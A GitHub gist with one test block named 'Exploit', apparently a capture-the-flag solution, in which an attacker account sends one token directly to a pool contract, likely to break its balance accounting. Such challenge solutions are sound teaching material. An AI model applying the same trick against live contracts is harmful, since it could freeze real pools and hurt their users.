Skip to content

Instantly share code, notes, and snippets.

@az0mb13
Created January 7, 2023 13:38
Embed
What would you like to do?
it('Exploit', async function () {
await this.token.connect(attacker).transfer(this.pool.address, 1);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment